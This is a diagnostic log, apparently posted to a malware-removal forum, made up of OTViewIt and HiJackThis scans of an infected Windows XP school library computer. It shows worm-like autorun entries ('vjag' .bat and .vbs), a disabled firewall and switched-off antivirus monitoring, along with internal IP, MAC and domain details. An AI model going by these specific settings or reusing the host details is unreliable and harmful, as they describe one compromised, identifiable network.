[2009/04/02 14:51:46 | 00,002,048 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2009/04/02 14:23:20 | 05,362,852 | -H-- | M] () -- C:\Documents and Settings\administrator.VVIEW\Local Settings\Application Data\IconCache.db
[2009/04/02 13:34:08 | 00,401,720 | ---- | M] (Trend Micro Inc.) -- C:\HiJackThis.exe.exe
[2009/04/02 13:33:26 | 00,422,912 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\administrator.VVIEW\Desktop\powerpnt.exe.exe
[2009/04/01 13:49:56 | 04,840,017 | ---- | M] () -- C:\Documents and Settings\administrator.VVIEW\Desktop\Virus Script.rtf
[2009/04/01 12:00:53 | 00,000,410 | ---- | M] () -- C:\WINDOWS\tasks\Schedule Task Weekly.job
[2009/04/01 09:05:24 | 00,000,000 | ---- | M] () -- C:\WINDOWS\System32\MSVolume.dll
[2009/04/01 08:54:48 | 00,000,162 | -H-- | M] () -- C:\WINDOWS\System32\~$vjag.doc
[2009/04/01 08:54:10 | 00,001,844 | -HS- | M] () -- C:\WINDOWS\System32\vjag.doc
[2009/03/23 08:15:27 | 00,001,724 | -H-- | M] () -- C:\Documents and Settings\administrator.VVIEW\My Documents\Default.rdp
[2009/03/20 16:04:01 | 00,000,284 | ---- | M] () -- C:\WINDOWS\tasks\AppleSoftwareUpdate.job
[2009/03/20 13:27:06 | 00,000,072 | ---- | M] () -- C:\WINDOWS\bi_group.ini
[2009/03/20 09:08:14 | 00,523,324 | ---- | M] () -- C:\WINDOWS\System32\PerfStringBackup.INI
[2009/03/20 09:08:14 | 00,488,332 | ---- | M] () -- C:\WINDOWS\System32\perfh009.dat
[2009/03/20 09:08:14 | 00,088,830 | ---- | M] () -- C:\WINDOWS\System32\perfc009.dat
[2009/03/16 15:07:22 | 00,278,152 | ---- | M] () -- C:\WINDOWS\System32\FNTCACHE.DAT
[2009/03/16 15:01:22 | 00,001,374 | ---- | M] () -- C:\WINDOWS\imsins.BAK
[2009/02/26 06:02:48 | 00,038,528 | ---- | M] (Sophos Plc) -- C:\WINDOWS\System32\drivers\savonaccessfilter.sys
[2009/02/26 06:02:37 | 00,110,848 | ---- | M] (Sophos Plc) -- C:\WINDOWS\System32\drivers\savonaccesscontrol.sys
[2009/02/25 15:54:59 | 24,768,960 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\MRT.exe
[2009/02/09 06:13:27 | 01,846,784 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\win32k.sys
[2009/02/09 06:13:27 | 01,846,784 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\win32k.sys

========== Custom Scans ==========

< End of report >

Extras
OTViewIt Extras logfile created on: 4/2/2009 3:05:50 PM - Run 2
OTViewIt by OldTimer - Version 1.0.21.0 Folder = C:\Documents and Settings\administrator.VVIEW\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 7.0.5730.13)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

1.99 Gb Total Physical Memory | 1.43 Gb Available Physical Memory | 71.78% Memory free
3.84 Gb Paging File | 3.37 Gb Available in Paging File | 87.82% Paging File free
Paging file location(s): C:\pagefile.sys 2046 4092;

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 74.50 Gb Total Space | 61.36 Gb Free Space | 82.36% Space Free | Partition Type: NTFS
Drive D: | 64.77 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: CDFS
E: Drive not present or media not loaded
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
I: Drive not present or media not loaded

Computer Name: 103_LIB_S3
Current User Name: Administrator
Logged in as Administrator.

Current Boot Mode: Normal
Scan Mode: All users
Whitelist: On
File Age = 60 Days

========== File Associations ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]

========== Security Center Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"FirstRunDisabled"=1
"AntiVirusDisableNotify"=0
"FirewallDisableNotify"=0
"UpdatesDisableNotify"=0
"AntiVirusOverride"=0
"FirewallOverride"=0
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\AhnlabAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ComputerAssociatesAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SophosAntiVirus]
"DisableMonitoring"=1
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TinyFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall]

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
"EnableFirewall"=0
"DoNotAllowExceptions"=0
"DisableNotifications"=0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts]

========== Authorized Applications List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
[2008/04/14 05:42:36 | 00,141,312 | ---- | M] (Microsoft Corporation) -- %windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019
[2008/04/14 00:23:34 | 00,558,080 | ---- | M] (Microsoft Corporation) -- %windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000
[2005/08/10 16:58:18 | 00,491,520 | ---- | M] () -- C:\WINDOWS\system32\DKabcoms.exe:*:Enabled:Dell Enhanced TCP/IP

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
[2008/04/14 05:42:36 | 00,141,312 | ---- | M] (Microsoft Corporation) -- %windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019
[2008/04/14 00:23:34 | 00,558,080 | ---- | M] (Microsoft Corporation) -- %windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000
[2007/07/24 15:17:08 | 00,229,376 | ---- | M] (Apple Inc.) -- C:\Program Files\Bonjour\mDNSResponder.exe:*:Enabled:Bonjour
[2008/03/30 10:36:34 | 20,638,504 | ---- | M] (Apple Inc.) -- C:\Program Files\iTunes\iTunes.exe:*:Enabled:iTunes
[2008/05/21 04:37:24 | 12,844,576 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE:*:Enabled:Microsoft Office Outlook
[2005/08/10 16:58:18 | 00,491,520 | ---- | M] () -- C:\WINDOWS\system32\DKabcoms.exe:*:Enabled:Dell Enhanced TCP/IP

========== (O10) Winsock2 Catalogs ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\]
NameSpace_Catalog5\Catalog_Entries\000000000004 [mdnsNSP] -- C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)

========== (O18) Protocol Handlers ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
ipp: [HKLM - No CLSID value]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\] - Protocol Handlers
[2007/08/28 23:55:14 | 01,014,128 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL ipp\0x00000001:{E1D2BF42-A96B-11d1-9C6B-0000F875AC61} (HKLM) [HKLM - MSDAMON.BINDER]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
msdaipp: [HKLM - No CLSID value]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\] - Protocol Handlers
[2007/08/28 23:55:14 | 01,014,128 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL msdaipp\0x00000001:{E1D2BF42-A96B-11d1-9C6B-0000F875AC61} (HKLM) [HKLM - MSDAMON.BINDER]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\] - Protocol Handlers
[2007/08/28 23:55:14 | 01,014,128 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL msdaipp\oledb:{E1D2BF40-A96B-11d1-9C6B-0000F875AC61} (HKLM) [HKLM - MSDAIPP.BINDER]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
[2006/10/26 13:45:02 | 00,873,216 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Help\hxds.dll (ms-help:{314111c7-a502-11d2-bbca-00c04f8ec294} (HKLM) [HxProtocol Class])

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
[2007/05/10 13:45:34 | 08,069,464 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Web Components\11\OWC11.DLL (mso-offdap11:{32505114-5902-49B2-880A-1F7738E5A384} (HKLM) [Data Page Plugable Protocal mso-offdap11 Handler])

========== (O18) Protocol Filters ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\] - Protocol Filters
[2006/10/26 21:41:48 | 00,044,344 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OFFICE12\MSOXMLMF.DLL text/xml:{807563E5-5146-11D5-A672-00B0D022E945} (HKLM) [Microsoft Office InfoPath XML Mime Filter]

========== HKEY_LOCAL_MACHINE Uninstall List ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{02DFF6B1-1654-411C-8D7B-FD6052EF016F}"=Apple Software Update
"{034759DA-E21A-4795-BFB3-C66D17FAD183}"=Sophos Anti-Virus
"{08786A53-D98F-484A-867C-3302BC5AE30D}"=Digital Blue QX5 Microscope
"{08CA9554-B5FE-4313-938F-D4A417B81175}"=QuickTime
"{15C418EB-7675-42be-B2B3-281952DA014D}"=Sophos AutoUpdate
"{2348B97D-C991-438F-BC44-294C931E7B8B}"=SMART Essentials for Educators
"{26A24AE4-039D-4CA4-87B4-2F83216011FF}"=Java™ 6 Update 13
"{281ECE39-F043-492B-8337-F2E546B5604A}"=PowerDVD
"{2AFFFDD7-ED85-4A90-8C52-5DA9EBDC9B8F}"=Microsoft SQL Server 2005 Express Edition (MSSMLBIZ)
"{2BA00471-0328-3743-93BD-FA813353A783}"=Microsoft .NET Framework 3.0 Service Pack 1
"{30465B6C-B53F-49A1-9EBA-A3F187AD502E}"=Sonic Update Manager
"{3248F0A8-6813-11D6-A77B-00B0D0160050}"=Java™ 6 Update 5
"{34C7E079-2B62-478F-88B2-E3EDACDE5078}"=AVerVision Software
"{350C97B0-3D7C-4EE8-BAA9-00BCB3D54227}"=WebFldrs XP
"{353D20CC-719B-4A60-AD33-D03F88C10330}"=Microsoft Office Accounting PayPal Addin
"{44734179-8A79-4DEE-BB08-73037F065543}"=Apple Mobile Device Support
"{46486451-E60F-42C3-92D7-796D8594688A}"=SMART Board Software
"{46614A49-222A-48EF-87A9-BFD603E608E1}"=Microsoft Office Accounting Fixed Asset Manager
"{47BF1BD6-DCAC-468F-A0AD-E5DECC2211C3}"=Bonjour
"{50120000-1105-0000-0000-0000000FF1CE}"=Microsoft Office 2007 Primary Interop Assemblies
"{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}"=Microsoft SQL Server Setup Support Files (English)
"{56B4002F-671C-49F4-984C-C760FE3806B5}"=Microsoft SQL Server VSS Writer
"{585776BC-4BD6-4BD2-A19A-1D6CB44A403B}"=iTunes
"{5EE30018-CB99-464D-903D-F794592F503B}"=Lightspeed Systems User Agent v2.00.00
"{5FA793A6-0071-42C1-9355-8F69A428C44F}"=Microsoft Office Accounting ADP Payroll Addin
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}"=Microsoft Silverlight
"{8A708DD8-A5E6-11D4-A706-000629E95E20}"=Intel® Graphics Media Accelerator Driver
"{8C711818-076E-475C-B95B-DF11CD9D8DBE}"=Microsoft Office Accounting Equifax Addin
"{90120000-0010-0409-0000-0000000FF1CE}"=Microsoft Software Update for Web Folders (English) 12
"{90120000-0015-0409-0000-0000000FF1CE}"=Microsoft Office Access MUI (English) 2007
"{90120000-0015-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0016-0409-0000-0000000FF1CE}"=Microsoft Office Excel MUI (English) 2007
"{90120000-0016-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0018-0409-0000-0000000FF1CE}"=Microsoft Office PowerPoint MUI (English) 2007
"{90120000-0018-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0019-0409-0000-0000000FF1CE}"=Microsoft Office Publisher MUI (English) 2007
"{90120000-0019-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001A-0409-0000-0000000FF1CE}"=Microsoft Office Outlook MUI (English) 2007
"{90120000-001A-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001B-0409-0000-0000000FF1CE}"=Microsoft Office Word MUI (English) 2007
"{90120000-001B-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001F-0409-0000-0000000FF1CE}"=Microsoft Office Proof (English) 2007
"{90120000-001F-0409-0000-0000000FF1CE}_PROHYBRIDR_{3EC77D26-799B-4CD8-914F-C1565E796173}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001F-040C-0000-0000000FF1CE}"=Microsoft Office Proof (French) 2007
"{90120000-001F-040C-0000-0000000FF1CE}_PROHYBRIDR_{430971B1-C31E-45DA-81E0-72C095BAB72C}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001F-0C0A-0000-0000000FF1CE}"=Microsoft Office Proof (Spanish) 2007
"{90120000-001F-0C0A-0000-0000000FF1CE}_PROHYBRIDR_{F7A31780-33C4-4E39-951A-5EC9B91D7BF1}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-002C-0409-0000-0000000FF1CE}"=Microsoft Office Proofing (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}"=Microsoft Office Shared MUI (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}_PROHYBRIDR_{FAD8A83E-9BAC-4179-9268-A35948034D85}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0115-0409-0000-0000000FF1CE}"=Microsoft Office Shared Setup Metadata MUI (English) 2007
"{90120000-0115-0409-0000-0000000FF1CE}_PROHYBRIDR_{FAD8A83E-9BAC-4179-9268-A35948034D85}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0117-0409-0000-0000000FF1CE}"=Microsoft Office Access Setup Metadata MUI (English) 2007
"{90120000-0117-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90A40409-6000-11D3-8CFE-0150048383C9}"=Microsoft Office 2003 Web Components
"{91120000-0031-0000-0000-0000000FF1CE}"=Microsoft Office Professional Hybrid 2007
"{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{BEE75E01-DD3F-4D5F-B96C-609E6538D419}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{A06275F4-324B-4E85-95E6-87B2CD729401}"=Windows Defender
"{A939D341-5A04-4E0A-BB55-3E65B386432D}"=Microsoft Office Small Business Connectivity Components
"{AC76BA86-7AD7-1033-7B44-A81200000003}"=Adobe Reader 8.1.2
"{B0717D5A-1976-482B-9ADF-F19631A541A4}"=Microsoft Office Accounting 2007
"{B32C4059-6E7A-41EF-AD20-56DF1872B923}"=Business Contact Manager for Outlook 2007 SP1
"{B4092C6D-E886-4CB2-BA68-FE5A88D31DE6}_is1"=Spybot - Search & Destroy
"{B508B3F1-A24A-32C0-B310-85786919EF28}"=Microsoft .NET Framework 2.0 Service Pack 1
"{B7F54262-AB66-44B3-88BF-9FC69941B643}"=Broadcom Gigabit Integrated Controller
"{BAF78226-3200-4DB4-BE33-4D922A799840}"=Windows Presentation Foundation
"{BD68F46D-8A82-4664-8E68-F87C55BDEFD4}"=Microsoft SQL Server Native Client
"{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}"=Microsoft .NET Framework 1.1
"{F0A37341-D692-11D4-A984-009027EC0A9C}"=SoundMAX
"{FCD9CD52-7222-4672-94A0-A722BA702FD0}"=Dell Resource CD
"{FF11005D-CBC8-45D5-A288-25C7BB304121}"=Sophos Remote Management System
"{FF9278B4-1A52-4E18-A668-E9F2219F5798}"=Classroom Performance System
"9C7E96126D886BC04FAA6ABAD9312271DB76E1F1"=Windows Driver Package - Digital Blue (marsqx5) Image (04/04/2007 1.0.0.0)
"Adobe Flash Player ActiveX"=Adobe Flash Player ActiveX
"Adobe Shockwave Player"=Adobe Shockwave Player 11
"Ask Toolbar_is1"=Ask Toolbar
"Business Contact Manager"=Business Contact Manager for Outlook 2007 SP1
"Dell_HostCD"=Dell Software Uninstall
"ePatLauncher"=ePatLauncher
"HijackThis"=HijackThis 2.0.2
"IDNMitigationAPIs"=Microsoft Internationalized Domain Names Mitigation APIs
"InstallShield_{34C7E079-2B62-478F-88B2-E3EDACDE5078}"=AVerVision Software
"Lotus Notes"=Lotus Notes
"Microsoft .NET Framework 1.1 (1033)"=Microsoft .NET Framework 1.1
"Microsoft Office Accounting 2007"=Microsoft Office Accounting 2007
"Microsoft SQL Server 2005"=Microsoft SQL Server 2005
"MSCompPackV1"=Microsoft Compression Client Pack 1.0 for Windows XP
"NLSDownlevelMapping"=Microsoft National Language Support Downlevel APIs
"PROHYBRIDR"=2007 Microsoft Office system
"TestNav"=TestNav
"WIC"=Windows Imaging Component
"Windows Media Format Runtime"=Windows Media Format 11 runtime
"Windows Media Player"=Windows Media Player 11
"Windows XP Service Pack"=Windows XP Service Pack 3
"WMFDist11"=Windows Media Format 11 runtime
"wmp11"=Windows Media Player 11
"Wudf01000"=Microsoft User-Mode Driver Framework Feature Pack 1.0
"XpsEPSC"=XML Paper Specification Shared Components Pack 1.0

========== Last 10 Event Log Errors ==========

[ Application Events ]
Error - 3/30/2009 5:00:43 PM | Computer Name = 103_LIB_S3 | Source = MPSampleSubmission | ID = 5000
Description = EventType mptelemetry, P1 80072efd, P2 endsearch, P3 search, P4 1.1.1593.0,
P5 mpsigdwn.dll, P6 1.1.1593.0, P7 windows defender, P8 NIL, P9 NIL, P10 NIL.

Error - 3/31/2009 1:00:18 PM | Computer Name = 103_LIB_S3 | Source = MPSampleSubmission | ID = 5000
Description = EventType mptelemetry, P1 80072efd, P2 endsearch, P3 search, P4 1.1.1593.0,
P5 mpsigdwn.dll, P6 1.1.1593.0, P7 windows defender, P8 NIL, P9 NIL, P10 NIL.

[ System Events ]
Error - 1/10/2009 1:52:06 PM | Computer Name = 103_LIB_S3 | Source = Kerberos | ID = 7
Description = The kerberos subsystem encountered a PAC verification failure. This
indicates that the PAC from the client 103_LIB_S3$ in realm VVIEW.EDU had a PAC
which failed to verify or was modified. Contact your system administrator.

Error - 1/10/2009 3:25:08 PM | Computer Name = 103_LIB_S3 | Source = Kerberos | ID = 7
Description = The kerberos subsystem encountered a PAC verification failure. This
indicates that the PAC from the client 103_LIB_S3$ in realm VVIEW.EDU had a PAC
which failed to verify or was modified. Contact your system administrator.

Error - 1/18/2009 5:03:41 PM | Computer Name = 103_LIB_S3 | Source = Kerberos | ID = 7
Description = The kerberos subsystem encountered a PAC verification failure. This
indicates that the PAC from the client 103_LIB_S3$ in realm VVIEW.EDU had a PAC
which failed to verify or was modified. Contact your system administrator.

Error - 1/21/2009 6:16:21 PM | Computer Name = 103_LIB_S3 | Source = Kerberos | ID = 7
Description = The kerberos subsystem encountered a PAC verification failure. This
indicates that the PAC from the client 103_LIB_S3$ in realm VVIEW.EDU had a PAC
which failed to verify or was modified. Contact your system administrator.

Error - 1/21/2009 7:17:08 PM | Computer Name = 103_LIB_S3 | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
103_COUNSELOR that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{346168FD-2809-. The master browser is stopping or an election is being
forced.

Error - 1/23/2009 3:20:09 PM | Computer Name = 103_LIB_S3 | Source = Kerberos | ID = 7
Description = The kerberos subsystem encountered a PAC verification failure. This
indicates that the PAC from the client 103_LIB_S3$ in realm VVIEW.EDU had a PAC
which failed to verify or was modified. Contact your system administrator.

Error - 2/2/2009 9:43:29 AM | Computer Name = 103_LIB_S3 | Source = Windows Update Agent | ID = 16
Description = Unable to Connect: Windows is unable to connect to the automatic updates
service and therefore cannot download and install updates according to the set
schedule. Windows will continue to try to establish a connection.

Error - 2/4/2009 9:43:30 AM | Computer Name = 103_LIB_S3 | Source = Windows Update Agent | ID = 16
Description = Unable to Connect: Windows is unable to connect to the automatic updates
service and therefore cannot download and install updates according to the set
schedule. Windows will continue to try to establish a connection.

Error - 3/20/2009 9:55:57 AM | Computer Name = 103_LIB_S3 | Source = SAVOnAccessFilter | ID = 3997759
Description = Failed to obtain volume information from mount manager.

Error - 3/31/2009 5:16:46 PM | Computer Name = 103_LIB_S3 | Source = Dhcp | ID = 1002
Description = The IP address lease 10.138.25.172 for the Network Card with network
address 00137217D6AA has been denied by the DHCP server 10.138.8.6 (The DHCP Server
sent a DHCPNACK message).


< End of report >

HiJackThis
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 3:07:18 PM, on 4/2/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16791)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe
C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe
C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe
C:\Program Files\Sophos\AutoUpdate\ALsvc.exe
C:\Program Files\Sophos\Remote Management System\RouterNT.exe
c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
C:\Program Files\Lightspeed Systems\User Agent\UAService.exe
C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Analog Devices\Core\smax4pnp.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe
C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
C:\WINDOWS\System32\WScript.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\Sophos\AutoUpdate\ALMon.exe
C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe
C:\Program Files\SMART Technologies Inc\SMART Board Software\Aware.exe
C:\Program Files\SMART Technologies Inc\SMART Board Software\Marker.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\HiJackThis.exe.exe
C:\WINDOWS\System32\cmd.exe
C:\WINDOWS\system32\xcopy.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.vview.net
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://go.microsoft.com/fwlink/?LinkId=74005
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: AskBar BHO - {201f27d4-3704-41d6-89c1-aa35e39143ed} - C:\Program Files\AskBarDis\bar\bin\askBar.dll
O2 - BHO: Sophos Web Content Scanner - {39EA7695-B3F2-4C44-A4BC-297ADA8FD235} - C:\Program Files\Sophos\Sophos Anti-Virus\SophosBHO.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: SMART Notebook Download Plugin - {67BCF957-85FC-4036-8DC4-D4D80E00A77B} - C:\Program Files\SMART Technologies Inc\Notebook Software\NotebookPlugin.dll
O2 - BHO: Java™ Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: Ask Toolbar - {3041d03e-fd4b-44e0-b742-2d9b88305f98} - C:\Program Files\AskBarDis\bar\bin\askBar.dll
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\Core\smax4pnp.exe
O4 - HKLM\..\Run: [igfxtray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [igfxhkcmd] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [igfxpers] C:\WINDOWS\system32\igfxpers.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Windows Defender] "C:\Program Files\Windows Defender\MSASCui.exe" -hide
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [ISUSPM Startup] C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
O4 - HKLM\..\Run: [ISUSScheduler] "C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe" -start
O4 - HKLM\..\Run: [PDVDDXSrv] "C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe"
O4 - HKLM\..\Run: [vjag] C:\WINDOWS\system32\auto\vjag3.bat
O4 - HKLM\..\Run: [vjag2] C:\WINDOWS\system32\auto\vjag.vbs
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
